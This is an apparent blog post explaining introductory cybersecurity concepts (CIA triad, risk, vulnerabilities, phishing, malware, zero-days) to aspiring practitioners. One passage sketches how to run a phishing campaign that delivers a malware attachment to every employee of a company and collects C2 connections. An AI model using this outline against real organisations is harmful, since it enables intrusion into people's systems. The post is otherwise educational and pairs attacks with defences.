I have been talking to a lot of aspiring cybersecurity members and they are all doing the same. Learning, learning, learning get some cert and the circle repeats…Certs get you an interview but your skills get you the job so when you are trying to learn something new focus on understanding it, instead of just learning it. Also, I found that many people cant share their knowledge and explain the concepts or techniques in an effective, understandable way. In this post, I will try to explain some of the basic concepts from a different perspective to help you all understand the cyber world better!
CIA triad
- Confidentiality – Maintaining confidentiality means that information is never disclosed to unauthorized individuals.
- Integrity – This refers to making sure your data remains accurate and unchanged.
- Availability – This means that the system is available to authorized entities without disruptions
Confidentiality, how do I know that I got a message from a trusted person or a hacker? By authenticating, how do we authenticate persons? By something they know (passwords, passphrases), they have (mobile with 2FA, RFID)or they are (biometric data like fingerprint, retina).In the Cyber world, we use certificates, asymmetric encryption, tokens, etc…
Cookie stealing, RFID cloning, and traffic sniffing are all attacks directed to break confidentiality.
Integrity guarantees us that the data has not been modified (manipulated, removed) in any way from the moment of sending to the moment of receiving. For this reason, we use traffic encryption, normally SSL and put everything over it, for example, SFTP, HTTPS, and SMPTPS.
Something I saw myself plenty of times is devs leaving PUT and DELETE methods enabled in their web servers. If not properly filtered, this can lead to deleting everything on the web server or compromising it via uploading a shell and executing it. A solution also can be an attack, we can encrypt our data against sniffing techniques but ransomware also can encrypt my disk asking for some BitCoins.
In the Cyber world, everything has a solution and a counter for it. It’s a never-ending ever-changing world.
Getting back on track, data always has to be available, imagine that you can’t watch a Youtube video because the data centre just burnt down or visit a website because the webserver got a ransom. The best example of attacking availability is Denial of Service attacks. When we are bombarding a service like a web server or a fileserver with an enormous number of requests, regular users can experience slowness or total denegation of the service.
The industry doesn’t have a solution for this. In cloud environments, you can augment the resources. Also, you can build a failsafe system with 2 or more servers so if one goes down you will have another to provide.
Let’s see some more things!
Threat: Someone with the potential to cause harm by damaging or destroying the official data of a system or organization. Threats are anything (e.g., object, substance, human, etc.) that is capable of acting against an asset in a manner that can result in harm. A tornado is a threat, as is a flood, as is a hacker. The key consideration is that threats apply the force (water, wind, exploit code, etc.) against an asset that can cause a loss event to occur. Threats related to companies can be APTs, hacktivists, cyber terrorists…etc.Nowadays the hacker living in the basement is an outdated and harmless concept.
Risk: This is one if not the most important concepts because management, clients, and investors usually understand risk. Risk can be your common language for getting your message and a great way to approach people in higher ranks.
It refers to a combination of threat probability and impact/loss. In simple terms, it is related to potential damage or loss when a threat exploits the vulnerability. For example, you found a Stored XSS bug in the comment section of a web application. What could happen? An attacker can create a script that steals the cookies of the users and impersonate them or sell their data on the dark web, if this happens which is likely if we are speaking about well-known pages then the company loses customers, reputation and more importantly: money.
Vulnerability: It refers to weaknesses in a system that makes threat outcomes more possible and even more dangerous. By exploiting vulnerabilities, adversaries can compromise devices or denigrate their service (like using a buffer overflow to bring down a firewall). There are multiple ways to find vulnerabilities, like reverse engineering, fuzzing a program or just searching them in Google.
Some vulnerability databases are:
https://nvd.nist.gov/
https://cve.mitre.org/
and my favorite https://www.exploit-db.com/
Phishing: Phishing is a malicious attempt of pretending oneself as an authorized entity in electronic communication for obtaining sensitive information such as usernames, passwords, etc. through fraudulent messages and emails. Phishing is a common way to gain initial access to a system, just look up on Linkedin the employees of the company and I am 100% sure you will find a promotion with their email template. Construct an email with an attached malware saying newpremiums.pdf, send it to every employee of the company and connections will be popping up in your C2 server like fireworks.
The counter for this is security awareness training for your users, firewall, AV with network protection and UEBA because there is nothing that works 100% of the time.
Malware: Any software which is malicious like worms, ransomware, spyware, adware, trojans, keyloggers and many many more. Malware breaches a network through a vulnerability. When the user clicks a dangerous link, it downloads an email attachment or when an infected pendrive is used. One of the most common Malware is ransomware (for example Wannacry, Mamba, CryptoWare), ransomware encrypts your files and you can get the decryption key via paying the creators in Bitcoin.
To counter malware you should educate your users to not click on the suspicious link and not download everything from a questionable source. Also, use a firewall solution, AV, operations systems and software up to date. If you care about ransomware investing in a sandbox solution could be beneficial. What sandbox does, is creates an isolated environment to analyze the behaviour of a suspicious file. If it deletes, overwrites, removes or encrypts files then it will be removed and the database of the sandbox will be updated with the new risk. This also works to counter zero-days.
Zero-day exploit: Newly discovered vulnerabilities which don’t have patches yet. For example, the Follina (CVE-2022-30190) vulnerability still no has a patch, the only way you can counter it is to eliminate a registry related to the exploit. You can find zero-day exploits by fuzzing or reverse engineering software.
You can counter zero-days with sandbox solutions, these products analysis the behaviour of the program and do not look for signatures like some AVs.If a program changes its behaviour it will be quarantined instantly. Having an Incident Response plan is also a great way to try to prevent these types of attacks.
Data leakage: This is a fun one, an interviewer just asked me this the other day :D. Data Leakage refers to the illegal transmission of data to an external destination or unauthorized entity within an organization. It can transfer data either physically or electronically. It usually occurs via the web, emails, and mobile data storage devices. Data breaches can be accidental, ill-intentioned or using the wrong medium (some mediums send data across the Internet without proper encryption).
Common type of Cybersecurity attacks for 2022:
Malware
Phishing
Cross-Site scriptning
SQL injection
Watering Hole attack
Zero-day exploit
Denial of Service
Valid credentials
Insider Threat
